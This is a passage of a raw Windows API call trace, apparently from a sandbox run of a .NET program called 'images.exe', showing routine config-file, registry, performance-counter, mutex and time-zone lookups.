VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x47eadc, puLen=0x47ead8 | out: lplpBuffer=0x47eadc*=0x21f94f4, puLen=0x47ead8) returned 1 [0079.549] VerLanguageNameW (in: wLang=0x0, szLang=0x47e86c, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0079.550] VerQueryValueW (in: pBlock=0x21f9458, lpSubBlock="\\", lplpBuffer=0x47eaec, puLen=0x47eae8 | out: lplpBuffer=0x47eaec*=0x21f9480, puLen=0x47eae8) returned 1 [0079.551] CoTaskMemAlloc (cb=0x20c) returned 0x8ed740 [0079.551] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x8ed740 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0079.551] CoTaskMemFree (pv=0x8ed740) [0079.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x47e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0079.551] CoTaskMemAlloc (cb=0x20c) returned 0x8ed740 [0079.551] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x8ed740 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0079.551] CoTaskMemFree (pv=0x8ed740) [0079.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x47e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0079.551] GetCurrentProcess () returned 0xffffffff [0079.551] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eaa4 | out: TokenHandle=0x47eaa4*=0x294) returned 1 [0079.552] GetCurrentProcess () returned 0xffffffff [0079.552] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eaa4 | out: TokenHandle=0x47eaa4*=0x298) returned 1 [0079.552] GetCurrentProcess () returned 0xffffffff [0079.552] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47e970 | out: TokenHandle=0x47e970*=0x29c) returned 1 [0079.552] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x47e970 | out: lpFileInformation=0x47e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x47e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7e [0079.553] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x47e970 | out: lpFileInformation=0x47e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.553] GetCurrentProcess () returned 0xffffffff [0079.553] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eaa4 | out: TokenHandle=0x47eaa4*=0x2a0) returned 1 [0079.553] GetCurrentProcess () returned 0xffffffff [0079.553] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47e970 | out: TokenHandle=0x47e970*=0x2a4) returned 1 [0079.554] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x47e970 | out: lpFileInformation=0x47e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.554] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x47e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7c [0079.554] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x47e970 | out: lpFileInformation=0x47e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.554] GetCurrentProcess () returned 0xffffffff [0079.554] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eb84 | out: TokenHandle=0x47eb84*=0x2a8) returned 1 [0079.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x47e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0079.555] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x47eb84 | out: lpFileInformation=0x47eb84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0079.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x47e5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0079.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x47eab0) returned 1 [0079.555] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2ac [0079.555] GetFileType (hFile=0x2ac) returned 0x1 [0079.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x47eaac) returned 1 [0079.555] GetFileType (hFile=0x2ac) returned 0x1 [0079.555] GetFileSize (in: hFile=0x2ac, lpFileSizeHigh=0x47eb78 | out: lpFileSizeHigh=0x47eb78*=0x0) returned 0x8c8f [0079.556] ReadFile (in: hFile=0x2ac, lpBuffer=0x21fffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47eb34, lpOverlapped=0x0 | out: lpBuffer=0x21fffa0*, lpNumberOfBytesRead=0x47eb34*=0x1000, lpOverlapped=0x0) returned 1 [0079.556] ReadFile (in: hFile=0x2ac, lpBuffer=0x21fffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e9d0, lpOverlapped=0x0 | out: lpBuffer=0x21fffa0*, lpNumberOfBytesRead=0x47e9d0*=0x1000, lpOverlapped=0x0) returned 1 [0079.556] ReadFile (in: hFile=0x2ac, lpBuffer=0x21fffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e884, lpOverlapped=0x0 | out: lpBuffer=0x21fffa0*, lpNumberOfBytesRead=0x47e884*=0x1000, lpOverlapped=0x0) returned 1 [0079.556] ReadFile (in: hFile=0x2ac, lpBuffer=0x21fffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e884, lpOverlapped=0x0 | out: lpBuffer=0x21fffa0*, lpNumberOfBytesRead=0x47e884*=0x1000, lpOverlapped=0x0) returned 1 [0079.557] ReadFile (in: hFile=0x2ac, lpBuffer=0x21fffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e884, lpOverlapped=0x0 | out: lpBuffer=0x21fffa0*, lpNumberOfBytesRead=0x47e884*=0x1000, lpOverlapped=0x0) returned 1 [0079.557] ReadFile (in: hFile=0x2ac, lpBuffer=0x21fffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x47e7bc, lpOverlapped=0x0 | out: lpBuffer=0x21fffa0*, lpNumberOfBytesRead=0x47e7bc*=0x1000, lpOverlapped=0x0) returned 1 [0079.557] CloseHandle (hObject=0x2ac) returned 1 [0079.557] GetCurrentProcess () returned 0xffffffff [0079.557] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eb40 | out: TokenHandle=0x47eb40*=0x2ac) returned 1 [0079.557] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x47e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0079.558] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x47eb40 | out: lpFileInformation=0x47eb40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.558] GetCurrentProcess () returned 0xffffffff [0079.558] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eafc | out: TokenHandle=0x47eafc*=0x2b0) returned 1 [0079.558] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x47e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7e [0079.558] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x47eafc | out: lpFileInformation=0x47eafc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.558] GetCurrentProcess () returned 0xffffffff [0079.559] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47eab8 | out: TokenHandle=0x47eab8*=0x2b4) returned 1 [0079.559] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x47e564, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7c [0079.559] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x47eab8 | out: lpFileInformation=0x47eab8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0079.568] GetCurrentProcess () returned 0xffffffff [0079.568] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47e968 | out: TokenHandle=0x47e968*=0x2b8) returned 1 [0079.574] GetCurrentProcess () returned 0xffffffff [0079.574] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47e8a8 | out: TokenHandle=0x47e8a8*=0x2bc) returned 1 [0079.581] GetCurrentProcess () returned 0xffffffff [0079.581] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x47e8f0 | out: TokenHandle=0x47e8f0*=0x2c0) returned 1 [0079.748] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x8ac390 [0079.759] GetCurrentProcessId () returned 0x8d4 [0079.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x47e128, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0079.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x47e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0079.769] CoTaskMemAlloc (cb=0x32) returned 0x8e5438 [0079.769] CoTaskMemAlloc (cb=0xc8) returned 0x8edf68 [0079.770] CoTaskMemFree (pv=0x8e5438) [0079.770] CoTaskMemFree (pv=0x8edf68) [0079.975] GetComputerNameW (in: lpBuffer=0x47d4ec, nSize=0x2231310 | out: lpBuffer="XDUWTFONO", nSize=0x2231310) returned 1 [0079.986] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET Data Provider for SqlServer\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x47d724 | out: phkResult=0x47d724*=0x2c4) returned 0x0 [0079.986] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x47d738, lpData=0x0, lpcbData=0x47d734*=0x0 | out: lpType=0x47d738*=0x1, lpData=0x0, lpcbData=0x47d734*=0x1c) returned 0x0 [0079.987] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x47d738, lpData=0x2231f9c, lpcbData=0x47d734*=0x1c | out: lpType=0x47d738*=0x1, lpData="netfxperf.dll", lpcbData=0x47d734*=0x1c) returned 0x0 [0079.987] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x47d744, lpData=0x0, lpcbData=0x47d740*=0x0 | out: lpType=0x47d744*=0x4, lpData=0x0, lpcbData=0x47d740*=0x4) returned 0x0 [0079.987] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x47d744, lpData=0x47d730, lpcbData=0x47d740*=0x4 | out: lpType=0x47d744*=0x4, lpData=0x47d730*=0x1, lpcbData=0x47d740*=0x4) returned 0x0 [0079.987] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x47d744, lpData=0x0, lpcbData=0x47d740*=0x0 | out: lpType=0x47d744*=0x4, lpData=0x0, lpcbData=0x47d740*=0x4) returned 0x0 [0079.988] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x47d744, lpData=0x47d730, lpcbData=0x47d740*=0x4 | out: lpType=0x47d744*=0x4, lpData=0x47d730*=0x1386, lpcbData=0x47d740*=0x4) returned 0x0 [0079.988] RegCloseKey (hKey=0x2c4) returned 0x0 [0079.990] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net data provider for sqlserver\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x47d71c | out: phkResult=0x47d71c*=0x2c4) returned 0x0 [0079.990] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x47d73c, lpData=0x0, lpcbData=0x47d738*=0x0 | out: lpType=0x47d73c*=0x4, lpData=0x0, lpcbData=0x47d738*=0x4) returned 0x0 [0079.990] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x47d73c, lpData=0x47d728, lpcbData=0x47d738*=0x4 | out: lpType=0x47d73c*=0x4, lpData=0x47d728*=0x3, lpcbData=0x47d738*=0x4) returned 0x0 [0079.991] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x47d73c, lpData=0x0, lpcbData=0x47d738*=0x0 | out: lpType=0x47d73c*=0x4, lpData=0x0, lpcbData=0x47d738*=0x4) returned 0x0 [0079.991] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x47d73c, lpData=0x47d728, lpcbData=0x47d738*=0x4 | out: lpType=0x47d73c*=0x4, lpData=0x47d728*=0x20000, lpcbData=0x47d738*=0x4) returned 0x0 [0079.991] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x47d73c, lpData=0x0, lpcbData=0x47d738*=0x0 | out: lpType=0x47d73c*=0x3, lpData=0x0, lpcbData=0x47d738*=0x30a) returned 0x0 [0079.991] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x47d73c, lpData=0x2232888, lpcbData=0x47d738*=0x30a | out: lpType=0x47d73c*=0x3, lpData=0x2232888*, lpcbData=0x47d738*=0x30a) returned 0x0 [0079.992] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0079.995] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x47d678, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net data provider for sqlserver") returned 0x2c8 [0079.996] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x530000 [0079.997] VirtualQuery (in: lpAddress=0x530000, lpBuffer=0x47d71c, dwLength=0x1c | out: lpBuffer=0x47d71c*(BaseAddress=0x530000, AllocationBase=0x530000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0079.997] LocalFree (hMem=0x8d78f0) returned 0x0 [0079.997] RegCloseKey (hKey=0x2c4) returned 0x0 [0080.001] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2233da0, cbSid=0x47d6f8 | out: pSid=0x2233da0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.003] CreateMutexW (lpMutexAttributes=0x2233eb4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.003] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.004] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22340b8, cbSid=0x47d6bc | out: pSid=0x22340b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6bc) returned 1 [0080.004] CreateMutexW (lpMutexAttributes=0x2234194, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x0 [0080.004] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net data provider for sqlserver") returned 0x2cc [0080.005] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x1f4) returned 0x0 [0080.005] ReleaseMutex (hMutex=0x2cc) returned 1 [0080.005] CloseHandle (hObject=0x2cc) returned 1 [0080.005] GetCurrentProcessId () returned 0x8d4 [0080.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8d4) returned 0x2cc [0080.006] GetProcessTimes (in: hProcess=0x2cc, lpCreationTime=0x47d6c0, lpExitTime=0x47d6b8, lpKernelTime=0x47d6b8, lpUserTime=0x47d6b8 | out: lpCreationTime=0x47d6c0, lpExitTime=0x47d6b8, lpKernelTime=0x47d6b8, lpUserTime=0x47d6b8) returned 1 [0080.007] CloseHandle (hObject=0x2cc) returned 1 [0080.007] ReleaseMutex (hMutex=0x2c4) returned 1 [0080.007] CloseHandle (hObject=0x2c4) returned 1 [0080.008] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2234d30, cbSid=0x47d6f8 | out: pSid=0x2234d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x47d6f8) returned 1 [0080.008] CreateMutexW (lpMutexAttributes=0x2234e0c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0080.008] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0080.009] GetTimeZoneInformation (in: lpTimeZoneInformation=0x47d4e4 | out: lpTimeZoneInformation=0x47d4e4) returned 0x2 [0080.013] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x47d338 | out: pTimeZoneInformation=0x47d338) returned 0x2 [0080.015] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x47d41c | out: phkResult=0x47d41c*=0x2cc) returned 0x0 [0080.015] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x47d438, lpData=0x0, lpcbData=0x47d434*=0x0 | out: lpType=0x47d438*=0x3, lpData=0x0, lpcbData=0x47d434*=0x2c) returned 0x0 [0080.015] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x47d438, lpData=0x22358e4, lpcbData=0x47d434*=0x2c | out: lpType=0x47d438*=0x3, lpData=0x22358e4*, lpcbData=0x47d434*=0x2c) returned 0x0 [0080.016] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x47d270 | out: phkResult=0x47d270*=0x2d0) returned 0x0 [0080.016] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x47d28c, lpData=0x0, lpcbData=0x47d288*=0x0 | out: lpType=0x47d28c*=0x4, lpData=0x0, lpcbData=0x47d288*=0x4) returned 0x0 [0080.016] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x47d28c, lpData=0x47d278, lpcbData=0x47d288*=0x4 | out: lpType=0x47d28c*=0x4, lpData=0x47d278*=0x7d7, lpcbData=0x47d288*=0x4) returned 0x0 [0080.016] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x47d28c, lpData=0x0, lpcbData=0x47d288*=0x0 | out: lpType=0x47d28c*=0x4, lpData=0x0, lpcbData=0x47d288*=0x4) returned 0x0 [0080.016] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x47d28c, lpData=0x47d278, lpcbData=0x47d288*=0x4 | out: lpType=0x47d28c*=0x4, lpData=0x47d278*=0x7d8, lpcbData=0x47d288*=0x4) returned 0x0 [0080.016] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x47d28c, lpData=0x0, lpcbData=0x47d288*=0x0 | out: lpType=0x47d28c*=0x3, lpData=0x0, lpcbData=0x47d288*=0x2c) returned 0x0 [0080.016] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x47d28c, lpData=0x2235e48, lpcbData=0x47d288*=0x2c | out: lpType=0x47d28c*=0x3, lpData=0x2235e48*, lpcbData=0x47d288*=0x2c) returned 0x0 [0080.016] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x47d28c, lpData=0x0, 